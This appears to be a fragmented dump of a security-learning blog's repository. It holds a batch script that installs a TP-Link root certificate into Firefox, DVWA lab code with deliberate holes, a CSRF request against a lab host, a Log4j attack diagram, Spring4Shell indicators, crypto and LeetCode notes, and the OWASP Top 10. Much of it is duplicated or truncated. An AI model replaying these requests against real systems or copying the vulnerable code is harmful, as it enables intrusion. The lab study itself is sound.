echo ###checking new_version### echo -------------------------- set regPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox" set regPath2="HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox" set regKey="CurrentVersion" set regValue=""
set Value1="checkversion"
rem 检查新版本注册表是否存在 reg query %regPath1% >nul 2>nul echo %errorlevel% echo !errorlevel! if %errorlevel%==0 ( echo new_version Registry key %regkey% exists. for /f "tokens=2*" %%a in ('reg query %regPath1% /v %regKey% ^| findstr /i %regKey%') do ( if "%regValue%"=="" ( echo value not exists ) else ( set Value1=%%b ) ) ) else ( echo new_version Registry key %regkey% does not exist. echo -------------------------- ::检查旧版本注册表路径是否存在 echo ###checking old_version### reg query %regPath2% >nul 2>nul if !errorlevel!==0 ( echo old_version Registry key %regkey% exists. for /f "tokens=2*" %%a in ('reg query %regPath2% /v %regKey% ^| findstr /i %regKey%') do ( if "%regValue%"=="" ( echo value not exists ) else ( set Value1=%%b ) ) ) else ( echo old_version Registry key %regkey% does not exist. set Value1=0.0.0 )
echo !Value1! echo %Value1%
set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%" echo Majorold: %Major% )
echo !Value1! echo %Value1%
set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%" echo Majornew: %Major%
rem 检查版本号 if %final_version% EQU 0 ( echo Program version is 0. Exiting script... exit /b 1 ) else if %Major% LSS 49 ( call :function1 ) else ( call :function2 )
rem 退出脚本 exit /b
:: :function1 echo Program version is less than 49. Executing function 1... rem 执行函数1的代码,在49版本以下,更新cert8.db证书库。
::显示db中的现有证书 set "db_path=%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\" set default_name="" ::判断证书数据库路径是否存在 IF EXIST %db_path% ( echo default_path exists rem 在这里添加需要执行的命令 set "count=0" for /d %%i in ("%db_path%\*") do ( set /a count+=1 set "folder=%%~nxi" ) ::判断是否只有*.default这一个文件夹 if !count! equ 1 ( set default_name=!folder! set "all_path=%db_path%!default_name!" ::显示default文件夹全路径 echo !all_path! ::显示更新前证书库 C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path! ::更新证书库 C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -A -n "SomeNametest" -t "u,u,u" -i "C:\firefoxinstallcert\TPLINKCA.cer" -d !all_path! ::显示更新后的证书库 C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path! ) else ( echo no or more ) ) ELSE ( echo no )
goto :eof
:function2 echo Program version is greater than or equal to 49. Executing function 2... rem 执行函数2的代码,在49版本以上的FireFox中启用security.enterprise_roots.enabled
set source_file_cfg=C:\firefoxinstallcert\ddwi.cfg set "dest_dir_cfg=C:\Program Files\Mozilla Firefox\" echo Moving %source_file_cfg% to %dest_dir_cfg%... if exist "%source_file_cfg%" ( if exist "%dest_dir_cfg%" ( copy "%source_file_cfg%" "%dest_dir_cfg%" ) else ( echo Directory %dest_dir_cfg% does not exist! Cannot move file. ) ) else ( echo Source file %source_file_cfg% does not exist! Cannot move file. )
set "dest_dir_cfg_x86=C:\Program Files (x86)\Mozilla Firefox\" echo Moving %source_file_cfg% to %dest_dir_cfg_x86%... if exist "%source_file_cfg%" ( if exist "%dest_dir_cfg_x86%" ( copy "%source_file_cfg%" "%dest_dir_cfg_x86%" ) else ( echo Directory does not exist! Cannot move file. ) ) else ( echo Source file %source_file_cfg% does not exist! Cannot move file. )
set source_file_js=C:\firefoxinstallcert\local-settings.js set "dest_dir_js=C:\Program Files\Mozilla Firefox\defaults\pref\" echo Moving %source_file_js% to %dest_dir_js%... if exist "%source_file_js%" ( if exist "%dest_dir_js%" ( copy "%source_file_js%" "%dest_dir_js%" ) else ( echo Directory does not exist! Cannot move file. ) ) else ( echo Source file %source_file_js% does not exist! Cannot move file. ) set "dest_dir_js_x86=C:\Program Files (x86)\Mozilla Firefox\defaults\pref\" echo Moving %source_file_js% to %dest_dir_js_x86%... if exist "%source_file_js%" ( if exist "%dest_dir_js_x86%" ( copy "%source_file_js%" "%dest_dir_js_x86%" ) else ( echo Directory does not exist! Cannot move file. ) ) else ( echo Source file %source_file_js% does not exist! Cannot move file. )
@echo off ::开启变量延迟扩展 setlocal EnableExtensions EnableDelayedExpansion
echo ###checking new_version### echo -------------------------- set regPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox" set regPath2="HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox" set regKey="CurrentVersion" set regValue=""
set Value1="checkversion"
rem 检查新版本注册表是否存在 reg query %regPath1% >nul 2>nul echo %errorlevel% echo !errorlevel! if %errorlevel%==0 ( echo new_version Registry key %regkey% exists. for /f "tokens=2*" %%a in ('reg query %regPath1% /v %regKey% ^| findstr /i %regKey%') do ( if "%regValue%"=="" ( echo value not exists ) else ( set Value1=%%b ) ) ) else ( echo new_version Registry key %regkey% does not exist. echo -------------------------- ::检查旧版本注册表路径是否存在 echo ###checking old_version### reg query %regPath2% >nul 2>nul if !errorlevel!==0 ( echo old_version Registry key %regkey% exists. for /f "tokens=2*" %%a in ('reg query %regPath2% /v %regKey% ^| findstr /i %regKey%') do ( if "%regValue%"=="" ( echo value not exists ) else ( set Value1=%%b ) ) ) else ( echo old_version Registry key %regkey% does not exist. set Value1=0.0.0 )
echo !Value1! echo %Value1%
set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%" echo Majorold: %Major% )
echo !Value1! echo %Value1%
set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%" echo Majornew: %Major%
rem 检查版本号 if %final_version% EQU 0 ( echo Program version is 0. Exiting script... exit /b 1 ) else if %Major% LSS 49 ( call :function1 ) else ( call :function2 )
rem 退出脚本 exit /b
:: :function1 echo Program version is less than 49. Executing function 1... rem 执行函数1的代码,在49版本以下,更新cert8.db证书库。
::显示db中的现有证书 set "db_path=%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\" set default_name="" ::判断证书数据库路径是否存在 IF EXIST %db_path% ( echo default_path exists rem 在这里添加需要执行的命令 set "count=0" for /d %%i in ("%db_path%\*") do ( set /a count+=1 set "folder=%%~nxi" ) ::判断是否只有*.default这一个文件夹 if !count! equ 1 ( set default_name=!folder! set "all_path=%db_path%!default_name!" ::显示default文件夹全路径 echo !all_path! ::显示更新前证书库 C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path! ::更新证书库 C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -A -n "SomeNametest" -t "u,u,u" -i "C:\firefoxinstallcert\TPLINKCA.cer" -d !all_path! ::显示更新后的证书库 C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path! ) else ( echo no or more ) ) ELSE ( echo no )
goto :eof
:function2 echo Program version is greater than or equal to 49. Executing function 2... rem 执行函数2的代码,在49版本以上的FireFox中通过增加user.js配置文件启用security.enterprise_roots.enabled
::profiles默认配置文件目录 set "parentFolder=%APPDATA%\Mozilla\Firefox\Profiles" ::搜索存在default字符串的文件夹,即profiles配置文件夹 set "searchString=default" set source_user_js=C:\firefoxinstallcert\user.js ::将user.js文件拷贝到配置文件目录
IF EXIST %parentFolder% ( for /d %%F in ("%parentFolder%\*") do ( echo "%%~nxF" | findstr /C:"%searchString%" >nul 2>&1 if errorlevel 1 ( echo default Folder not found. ) else ( echo default Folder found. rem 拼接全路径 set "all_default_path=%parentFolder%\%%~nxF" echo !all_default_path! copy "%source_user_js%" !all_default_path! ) ) ) ELSE ( echo no ) goto :eof pause
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
<pre class="mermaid">graph LR A[Attacker crafts<br>malicious payload<br>with JNDI lookup] --> C{Log4j parses:<br>Contains JNDI lookup?} C -->|Yes| D[Execute<br>JNDI lookup] C -->|No| E[Normal log] D --> F[Connect to<br>attacker's server] F --> G[Download &<br>execute<br>malicious class] G --> H[Attacker gains<br>server control] classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px; classDef highlight fill:#f9d5e5,stroke:#333,stroke-width:2px; classDef decision fill:#e3f2fd,stroke:#333,stroke-width:1px; classDef danger fill:#ffebee,stroke:#333,stroke-width:1px; class A,H highlight; class C decision; class G danger;</pre>
graph LR A[Attacker crafts malicious payload with JNDI lookup] --> C{Log4j parses: Contains JNDI lookup?} C -->|Yes| D[Execute JNDI lookup] C -->|No| E[Normal log] D --> F[Connect to attacker's server] F --> G[Download & execute malicious class] G --> H[Attacker gains server control] classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px; classDef highlight fill:#f9d5e5,stroke:#333,stroke-width:2px; classDef decision fill:#e3f2fd,stroke:#333,stroke-width:1px; classDef danger fill:#ffebee,stroke:#333,stroke-width:1px; class A,H highlight; class C decision; class G danger;
sequenceDiagram前端->>前端: 用户首次打开前端页面前端->>后台: version : 0 请求同步数据后台->>前端: 返回数据,同时携带最大的versionnote right of 后台: 返回数据结构:{"version":100, data:[{},{},{}]}
SQL, HTML, iFrame, SSI, OS Command, XML, XPath, LDAP and SMTP injections Blind SQL and Blind OS Command injection Bash Shellshock (CGI) and Heartbleed vulnerability (OpenSSL) Cross-Site Scripting (XSS) and Cross-Site Tracing (XST) Cross-Site Request Forgery (CSRF) AJAX and Web Services vulnerabilities (JSON/XML/SOAP/WSDL) Malicious, unrestricted file uploads and backdoor files Authentication, authorization and session management issues Arbitrary file access and directory traversals Local and remote file inclusions (LFI/RFI) Configuration issues: Man-in-the-Middle, cross-domain policy files, information disclosures,... HTTP parameter pollution and HTTP response splitting Denial-of-Service (DoS) attacks: Slow HTTP and XML Entity Expansion Insecure distcc, FTP, NTP, Samba, SNMP, VNC, WebDAV configurations HTML5 ClickJacking, Cross-Origin Resource Sharing (CORS) and web storage issues Unvalidated redirects and forwards, and cookie poisoning Cookie poisoning and insecure cryptographic storage Server Side Request Forgery (SSRF) XML External Entity attacks (XXE) And much much much more…
// Checks to see where the request came from if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) { // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ];
对referer进行了检查
1 2 3 4 5 6 7 8 9
GET /vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change HTTP/1.1 Host: 49.232.78.252:81 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Connection: close Referer: http://49.232.78.252:81/vulnerabilities/csrf/ Cookie: PHPSESSID=9mjbjlhio6pup4mq4ne932fbo2; security=medium Upgrade-Insecure-Requests: 1
// Is it an image? if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && ( $uploaded_size < 100000 ) ) {
// Can we move the file to the upload folder? if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { // No echo'<pre>Your image was not uploaded.</pre>'; } else { // Yes! echo"<pre>{$target_path} succesfully uploaded!</pre>"; } } else { // Invalid file echo'<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; } }
// Check CAPTCHA from 3rd party $resp = recaptcha_check_answer( $_DVWA[ 'recaptcha_private_key'], $_POST['g-recaptcha-response'] );
// Did the CAPTCHA fail? if( !$resp ) { // What happens when the CAPTCHA was entered incorrectly $html .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>"; $hide_form = false; return; } else { // CAPTCHA was correct. Do both new passwords match? if( $pass_new == $pass_conf ) { // Show next stage for the user echo" <pre><br />You passed the CAPTCHA! Click the button to confirm your changes.<br /></pre> <form action=\"#\" method=\"POST\"> <input type=\"hidden\" name=\"step\" value=\"2\" /> <input type=\"hidden\" name=\"password_new\" value=\"{$pass_new}\" /> <input type=\"hidden\" name=\"password_conf\" value=\"{$pass_conf}\" /> <input type=\"submit\" name=\"Change\" value=\"Change\" /> </form>"; } else { // Both new passwords do not match. $html .= "<pre>Both passwords must match.</pre>"; $hide_form = false; } } }
// Check to see if both password match if( $pass_new == $pass_conf ) { // They do! $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); $pass_new = md5( $pass_new );
// Feedback for the end user echo"<pre>Password Changed.</pre>"; } else { // Issue with the passwords matching echo"<pre>Passwords did not match.</pre>"; $hide_form = false; }
?> <?php if (isset ($_POST['include'])) { $page[ 'body' ] .= " " . $_POST['include'] . " "; } $page[ 'body' ] .= ' <form name="csp" method="POST"> <p>Whatever you enter here gets dropped directly into the page, see if you can get an alert box to pop up.</p> <input size="50" type="text" name="include" value="" id="include" /> <input type="submit" value="Include" /> </form> ';
递归方法 classSolution: defspiralOrder(self, matrix: List[List[int]]) -> List[int]: m=len(matrix) if m==0orlen(matrix[0])==0: return [] n=len(matrix[0]) newlist=matrix[0] if m>1:
for i inrange(1,m): newlist.append(matrix[i][n-1])
for j inrange(n-2,-1,-1): newlist.append(matrix[m-1][j]) if n>1: for i inrange(n-2,0,-1): newlist.append(matrix[i][0]) M=[] for k inrange(1,m-1): t=matrix[k][1:-1] M.append(t)
思路清晰方法: classSolution: defspiralOrder(self, matrix: List[List[int]]) -> List[int]: res=[] iflen(matrix)==0: return [] #定义四个边界点 left=0 right=len(matrix[0])-1 top=0 bottom=len(matrix)-1 #在不超过边界的条件下,进行一轮循环 while (top<bottom and left<right): for i inrange(left,right): res.append(matrix[top][i]) for i inrange(top,bottom): res.append(matrix[i][right]) for i inrange(right,left,-1): res.append(matrix[bottom][i]) for i inrange(bottom,top,-1): res.append(matrix[i][left]) left+=1 top+=1 right-=1 bottom-=1 #如果剩余1行或1列:left=0 right1 if top==bottom: for i inrange(left,right+1): res.append(matrix[top][i]) elif left==right: for i inrange(top,bottom+1): res.append(matrix[i][left]) return res
任何多项式可以写为:f(x)=q(x)g(x)+r(x) r(x)称为余式 r(x)=f(x) mod g(x)
若不存在余式,则称g(x)整除f(x),g(x)|f(x)
若f(x)除了它本身和1外,不存在其它因式,则称f(x)是不可约多项式,或既约多项式、素多项式
系数在GF(p)中,以素多项式取模的多项式构成一个域
欧几里得算法
1 2 3 4 5 6 7
a可以表示成a = kb + r(a,b,k,r皆为正整数,且r<b),则r = a mod b 假设d是a,b的一个公约数,记作d|a,d|b,即a和b都可以被d整除。 而r = a - kb,两边同时除以d,r/d=a/d-kb/d=m,由等式右边可知m为整数,因此d|r 因此d也是b,a mod b的公约数 假设d是b,a mod b的公约数, 则d|b,d|(a-k*b),k是一个整数, 进而d|a.因此d也是a,b的公约数 因此(a,b)和(b,a mod b)的公约数是一样的,其最大公约数也必然相等,得证。
1 2 3 4 5
对于任何可以整除a和b的整数,那么它也一定能整除a-b(和b),因此我们选择该整数(前面提到的任何整数)为gcd(a,b),它一定比a-b和b的最大公约数小:gcd(a,b)<=gcd(a-b,b) 同理,任何可以整除a-b和b的整数,一定可以整除a和b,因此我们选择该整数为gcd(a-b,b),它一定比a和b的最大公约数小:gcd(a-b,b)<=gcd(a,b) 由此可知:gcd(a,b)=gcd(a-b,b) 因为总有整数n,使得 a - n*b = a mod b, 所以迭代可知:gcd(a-b,b)=gcd(a-2b,b)=...=gcd(a-n*b,b)=gcd(a mod b,b)
JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to write and execute code.
It does not depend on a browser, so you can even run it on Node.js.
Use the form below to convert your own script. Uncheck “eval source” to get back a plain string.
Given an array nums of n integers, are there elements a, b, c in nums such that a + b + c = 0? Find all unique triplets in the array which gives the sum of zero.
Notice that the solution set must not contain duplicate triplets.
parser.add_argument("--square", help="display a square of a given number", type=int) parser.add_argument("--cubic", help="display a cubic of a given number", type=int)
%% extract watermark FA2=fft2(FAO); G=(FA2-FA)/alpha; GG=G; fori=1:imsize(1)*0.5 forj=1:imsize(2) GG(M(i),N(j),:)=G(i,j,:); end end fori=1:imsize(1)*0.5 forj=1:imsize(2) GG(imsize(1)+1-i,imsize(2)+1-j,:)=GG(i,j,:); end end figure,imshow(GG);title('extracted watermark'); %imwrite(uint8(GG),'extracted watermark.jpg');
The OWASP Top 10 is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications.
注入
失效的身份验证
敏感信息泄露
XML外部实体(XXE)
失效的访问控制
安全配置错误
跨站脚本(XSS)
不安全的反序列化
使用含有已知漏洞的组件
不足的日志记录和监控
Injection. Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
Broken Authentication. Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities temporarily or permanently.
Sensitive Data Exposure. Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser.
XML External Entities (XXE). Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.
Broken Access Control. Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users’ accounts, view sensitive files, modify other users’ data, change access rights, etc.
Security Misconfiguration. Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must be patched/upgraded in a timely fashion.
Cross-Site Scripting (XSS). XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
Insecure Deserialization. Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.
Using Components with Known Vulnerabilities. Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.
Insufficient Logging & Monitoring. Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.
]]>
+
+
+
+
+ <blockquote>
+<p>The OWASP Top 10 is a standard awareness document for developers and web application security. It represents a broad consens
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 浏览器的同源策略与跨站请求伪造(CSRF)
+
+ http://h4m5t.github.io/2021/01/27/%E5%90%8C%E6%BA%90%E7%AD%96%E7%95%A5/
+ 2021-01-27T16:00:00.000Z
+ 2024-10-13T14:05:28.000Z
+
+ 定义
Telstra Cybersecurity Job SimulationAbouthttps://www.theforage.com/simulations/telstra/cybersecurity-cyyo
+GitHub repository: https://github.com/h4m5t/Telstra_Cybersecurity
+Telstra is Australia’s largest telecommunications company, offering services like mobile phones, internet, and data solutions to millions of customers nationwide. Known for its reliability and innovation, Telstra connects people and businesses, ensuring smooth and effective communication.
+The Telstra Cybersecurity Job Simulati ...
信息收集123456789101112┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness]└─# nmap -p- $IP Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 20:43 AESTNmap scan report for bizness.htb (10.129.232.1)Host is up (0.040s latency).Not shown: 65531 closed tcp ports (reset)PORT STATE SERVICE22/tcp open ssh80/tcp open http443/tcp open https41845/tcp open unknownNmap done: 1 IP address (1 host up) scanned in 12.65 seconds
+
+1echo "10.129.232. ...
\ No newline at end of file
diff --git a/page/2/index.html b/page/2/index.html
new file mode 100644
index 000000000..b4a5f3f3d
--- /dev/null
+++ b/page/2/index.html
@@ -0,0 +1,327 @@
+h4m5t's Blog - love is good
+
+
+
+
+
+
+
+
+
+
+
xray下载社区版下载和使用
+注意下载新版的,旧版可能无法加载自定义POC
+https://github.com/chaitin/xray/releases
+使用方法查看help
+xray_windows_amd64.exe webscan --help
+1234567891011121314151617181920212223242526272829Version: 1.9.11/eb0c331d/COMMUNITYNAME: xray - A powerful scanner engine [https://docs.xray.cool]USAGE: [global options] command [command options] [arguments...]COMMANDS: webscan, ws Run a webscan task servicescan, ss Run a service scan task subdomain, sd Run a subdomain task poclint, pl, lint ...
HexoWelcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
+Quick StartCreate a new post1$ hexo new "My New Post"
+
+More info: Writing
+Clean1$ hexo clean
+
+Run server1$ hexo server
+
+More info: Server
+Generate static files1$ hexo generate
+
+More info: Generating
+Deploy to remote sites1$ hexo deploy
+
+More info: Deployment
+Actions自动化部署Hexo自动化工作流总是遇到问题,今天终 ...
\ No newline at end of file
diff --git a/page/3/index.html b/page/3/index.html
new file mode 100644
index 000000000..306ff7ec9
--- /dev/null
+++ b/page/3/index.html
@@ -0,0 +1,353 @@
+h4m5t's Blog - love is good
+
+
+
+
+
+
+
+
+
+
+
+bWAPP靶场训练记录,之前就搭好的,一直没练,现在有空练一下
+
+主要内容有:一个很综合的靶场,不错!
+1234567891011121314151617181920SQL, HTML, iFrame, SSI, OS Command, XML, XPath, LDAP and SMTP injectionsBlind SQL and Blind OS Command injectionBash Shellshock (CGI) and Heartbleed vulnerability (OpenSSL)Cross-Site Scripting (XSS) and Cross-Site Tracing (XST)Cross-Site Request Forgery (CSRF)AJAX and Web Services vulnerabilities (JSON/XML/SOAP/WSDL)Malicious, unrestricted file uploads and backdoor filesAuthentication, authorization and session m ...
+李卫海PPT学习笔记
+
+其他概念Needham-Schroeder协议:
+利用对称密码技术分发密钥。A,B分别与T有静态密钥。借助信任权威T,分发对称密钥Kab
+多项式GCD算法
+重点:模重复平方算法
+123456c=1for i =k-1 to 0: c=(c^2)mod n if ei==1: c=c*m mod n return
+
+难点:AES列混合矩阵计算,有限域上的多项式模运算。
+对合算法
+对合运算:f =f‘ ,模 2加运算是对合运算。密码算法是对和运算,则加密算法=解密算法,工程实现工作量减半。
+同态加密(英语:Homomorphic encryption)是一种加密形式,它允许人们对密文进行特定形式的代数运算得到仍然是加密的结果,将其解密所得到的结果与对明文进行同样的运算结果一样。换言之,这项技术令人们可以在加密的数据中进行诸如检索、比较等操作,得出正确的结果,而在整个处理过程中无需对数据进行解密。其意义在于,真正从根本上解决将数据及其操作委托给第三方时的保密问题,例如对于各种云计算的应用。
+零知识证明是一种特殊的 ...
\ No newline at end of file
diff --git a/page/4/index.html b/page/4/index.html
new file mode 100644
index 000000000..44b2b5c37
--- /dev/null
+++ b/page/4/index.html
@@ -0,0 +1,429 @@
+h4m5t's Blog - love is good
+
+
+
+
+
+
+
+
+
+
+
ISCC练武题适合新手的题,练练手
+WEB-1
+
+打开环境,是一个投票页面
+
+
+题目要求:在20秒之内让左边的票数高过右边的
+
+方法一:Python写脚本模拟点击,实现刷票
+方法二:修改左右客服的ID
+方法三:直接在控制台修改左边票数的数据
+
+WEB-2查看源码
+
+
+是JS编码
+http://www.jsfuck.com/
+打开在线网站,直接提交这串编码即出flag
+
+JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to write and execute code.
+It does not depend on a browser, so you can even run it on Node.js.
+Use the form below to convert your own script. Uncheck “eval source” to get back a p ...
\ No newline at end of file
diff --git a/page/5/index.html b/page/5/index.html
new file mode 100644
index 000000000..ff98d8013
--- /dev/null
+++ b/page/5/index.html
@@ -0,0 +1,447 @@
+h4m5t's Blog - love is good
+
+
+
+
+
+
+
+
+
+
+
+3sum跟之前的2sum有点像,但难度更大一些
+
+leetcode.15
+题目描述 :123Given an array nums of n integers, are there elements a, b, c in nums such that a + b + c = 0? Find all unique triplets in the array which gives the sum of zero.Notice that the solution set must not contain duplicate triplets.
+
+范围0 <= nums.length <= 3000
+方法1:枚举所有方法,时间复杂度n^3,会超时
+方法2:排序
+哈希法(2等1)
+循环i,j 此时 t=0-nums[i]-nums[j]
+根据哈希,判断t是否在数组中出现过
+注意:需要去重
+方法3:排序
+双指针(1等2)
+t=0-nums[i]-nums[j]
+思路:
+固定i指针,j,k分别在两端,交替向中间靠拢(比较t)
+注意:去重
+代码12345678910 ...
\ No newline at end of file
diff --git a/page/6/index.html b/page/6/index.html
new file mode 100644
index 000000000..290e2a9ed
--- /dev/null
+++ b/page/6/index.html
@@ -0,0 +1,417 @@
+h4m5t's Blog - love is good
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/page/7/index.html b/page/7/index.html
new file mode 100644
index 000000000..3b0344b7d
--- /dev/null
+++ b/page/7/index.html
@@ -0,0 +1,367 @@
+h4m5t's Blog - love is good
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/page/8/index.html b/page/8/index.html
new file mode 100644
index 000000000..367aa999f
--- /dev/null
+++ b/page/8/index.html
@@ -0,0 +1,515 @@
+h4m5t's Blog - love is good
+
+
+
+
+
+
+
+
+
+
+
+The OWASP Top 10 is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications.
+
+
+注入
+失效的身份验证
+敏感信息泄露
+XML外部实体(XXE)
+失效的访问控制
+安全配置错误
+跨站脚本(XSS)
+不安全的反序列化
+使用含有已知漏洞的组件
+不足的日志记录和监控
+
+
+
+Injection. Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into execu ...
\ No newline at end of file
diff --git a/page/9/index.html b/page/9/index.html
new file mode 100644
index 000000000..b1f918d74
--- /dev/null
+++ b/page/9/index.html
@@ -0,0 +1,332 @@
+h4m5t's Blog - love is good
+
+
+
+
+
+
+
+
+
+
+
Telstra is Australia’s largest telecommunications company, offering services like mobile phones, internet, and data solutions to millions of customers nationwide. Known for its reliability and innovation, Telstra connects people and businesses, ensuring smooth and effective communication.
The Telstra Cybersecurity Job Simulation Project is a training program designed to replicate real-world cybersecurity challenges. Participants work through tasks such as detecting threats, responding to incidents, collaborating with different teams, and implementing technical solutions to protect digital systems. This simulation helps individuals build the skills needed to defend against cyber attacks and keep Telstra’s services secure.
In the dynamic realm of cybersecurity, organizations must remain vigilant and responsive to emerging threats to safeguard their infrastructure and services. This blog post presents a detailed case study of how Telstra’s Security Operations Centre (SOC) effectively responded to a Spring4Shell (CVE-2022-22965) malware attack targeting the NBN Connection service. We will walk through the entire incident response process, encompassing initial threat triage, inter-team communication, technical mitigation using Python-based firewall rules, troubleshooting, and a post-incident analysis.
Task 1: Initial Threat Triage and Notification
Incident Identification and Severity Assessment
On March 20th, 2024, at 14:20 UTC, the SOC detected unusual activity targeting the NBN Connection service (nbn.external.network), which operates on Spring Framework 5.3.0. The attack manifested through multiple malicious POST requests to the /tomcatwar.jsp endpoint, indicating an exploitation attempt of the Spring4Shell vulnerability.
Affected Infrastructure and Prioritization
An analysis of firewall logs revealed that the NBN Connection service was under direct attack. Given its critical role in providing high-speed internet connectivity, the incident was classified as P1 - Critical. Other services, including Mobile Tower Connection, Home & Business Lines, and ADSL Connect, were evaluated and found to be unaffected based on the current logs. Nonetheless, continuous monitoring was recommended to ensure comprehensive security.
Notification of the Respective Team
Prompt communication was essential to coordinate an effective response. An urgent email was drafted and sent to the NBN Team, alerting them of the ongoing attack and the necessity to initiate immediate incident response measures.
Email to NBN Team:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
From: Telstra Security Operations To: NBN Team (nbn@email) Subject: Urgent: Malware Attack Impacting NBN Connection Service
--- Body:
Hello NBN Team,
At **14:20 on March 20, 2024**, a malware attack targeting the **NBN Connection service** running on the **Spring Framework** was detected, resulting in service disruption and impaired functionality. This incident has been assessed as **P1 - Critical** and requires the immediate initiation of incident response measures to restore services and prevent further impact.
Please review the relevant logs promptly and take the necessary mitigation actions. If you need assistance or have any questions, feel free to contact us.
Kind regards, Telstra Security Operations
This communication ensured that the NBN Team was promptly informed, enabling them to take swift action to mitigate the threat.
Task 2: Collaborating with the Networks Team to Mitigate the Attack
Analyzing Firewall Logs and Identifying Attack Patterns
Upon identifying the attack, the SOC conducted a thorough analysis of the firewall logs. The logs indicated that the attack originated from multiple IP addresses within the AU region, utilizing specific malicious payloads designed to exploit the Spring4Shell vulnerability. The attack pattern involved POST requests to the /tomcatwar.jsp endpoint with parameters like class.module.classLoader.resources.context.parent.pipeline.first.pattern and others.
Drafting an Email to the Networks Team
To address the distributed nature of the attack without blocking individual IP addresses, the SOC collaborated with the Networks Team to implement a firewall rule that filters incoming traffic based on the identified malicious request characteristics.
From: Telstra Security Operations To: Networks Team (networks@email) Subject: Create Firewall Rule to Mitigate Spring4Shell Attack
--- Body:
Hello Networks Team,
We would like to request the creation of a firewall rule and provide you with more information about the ongoing attack.
